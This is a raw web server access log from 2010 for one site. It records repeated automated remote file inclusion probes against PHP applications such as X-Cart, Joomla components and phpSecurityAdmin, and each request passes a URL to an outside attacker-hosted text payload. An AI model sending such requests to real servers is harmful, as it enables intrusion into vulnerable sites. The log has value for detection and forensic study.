210.204.38.42 - - [05/Mar/2010:05:48:03 -0800] "GET /admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:03 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:48:06 -0800] "GET /logs/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:48:06 -0800] "GET /?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:48:07 -0800] "GET /logs/access_100219.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:48:07 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:32 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:32 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:32 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:53 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:53 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:53 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:54 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:48:55 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:56 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:56 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:48:56 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:48:57 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:48:57 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:48:57 -0800] "GET /logs/access_100209.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:48:57 -0800] "GET /logs/access_100212.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:48:57 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:48:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:48:57 -0800] "GET /logs/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:48:58 -0800] "GET /?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:49:02 -0800] "GET /logs/access_100224.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:49:02 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:49:03 -0800] "GET /admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:49:03 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:49:04 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:49:04 -0800] "GET /logs/access_100220.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:49:05 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:05:49:05 -0800] "GET /logs/access_100224.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:49:06 -0800] "GET /logs/access_100220.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:49:09 -0800] "GET /?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:49:10 -0800] "GET /logs/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:49:11 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:49:12 -0800] "GET /logs/access_100219.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:49:37 -0800] "GET /logs/access_100220.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:49:38 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:49:39 -0800] "GET /logs/access_100212.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:49:39 -0800] "GET /logs/access_100209.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:49:39 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:49:40 -0800] "GET /logs/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:49:40 -0800] "GET /?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:49:41 -0800] "GET /logs/access_100219.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:49:44 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:49:44 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:05:49:45 -0800] "GET /logs/errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:05:49:45 -0800] "GET /errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:05:49:45 -0800] "GET /logs/access_100226.log%20%20/errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:49:45 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:49:46 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:49:49 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:49:50 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:49:53 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:50:20 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [05/Mar/2010:05:50:55 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:51:02 -0800] "GET /logs/access_100214.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:17 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:17 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:17 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:05:51:20 -0800] "GET /logs/access_100220.log%20%20///ktmllitee/includes/ktedit/toolbar.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:05:51:20 -0800] "GET //ktmllitee/includes/ktedit/toolbar.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:05:51:26 -0800] "GET //ktmllitee/includes/ktedit/toolbar.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:05:51:26 -0800] "GET /logs/access_100220.log%20%20///ktmllitee/includes/ktedit/toolbar.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:05:51:26 -0800] "GET /logs///ktmllitee/includes/ktedit/toolbar.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:31 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:31 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:31 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:31 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:31 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:31 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:35 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:35 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:35 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:46 -0800] "GET /logs/access_100220.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:51:47 -0800] "GET /logs/access_100220.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:05:51:48 -0800] "GET /logs/access_100129.log%20%20///ktmllitee/includes/ktedit/toolbar.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:51:59 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:51:59 -0800] "GET /logs/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:51:59 -0800] "GET /?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:05:51:59 -0800] "GET /logs/access_100129.log%20%20///ktmllitee/includes/ktedit/toolbar.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:52:02 -0800] "GET /logs/access_100220.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:52:21 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:52:21 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:52:21 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:52:22 -0800] "GET /logs/access_100220.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [05/Mar/2010:05:52:23 -0800] "GET /logs/access_100129.log%20%20/errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:52:32 -0800] "GET /logs/access_100220.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:05:52:37 -0800] "GET /logs/access_100220.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:52:40 -0800] "GET /logs/access_100214.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:52:57 -0800] "GET /logs/access_100219.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:52:57 -0800] "GET /logs/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:52:58 -0800] "GET /?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:05:53:01 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:05:53:01 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:05:53:01 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:53:03 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:05:53:28 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:05:53:28 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:05:53:28 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:05:53:35 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:05:53:35 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:05:53:35 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:05:53:44 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:05:53:44 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [05/Mar/2010:05:53:44 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:53:48 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:53:48 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:53:48 -0800] "GET /logs/access_100209.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:05:53:49 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:05:53:49 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:05:53:50 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:53:59 -0800] "GET /logs/access_100209.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
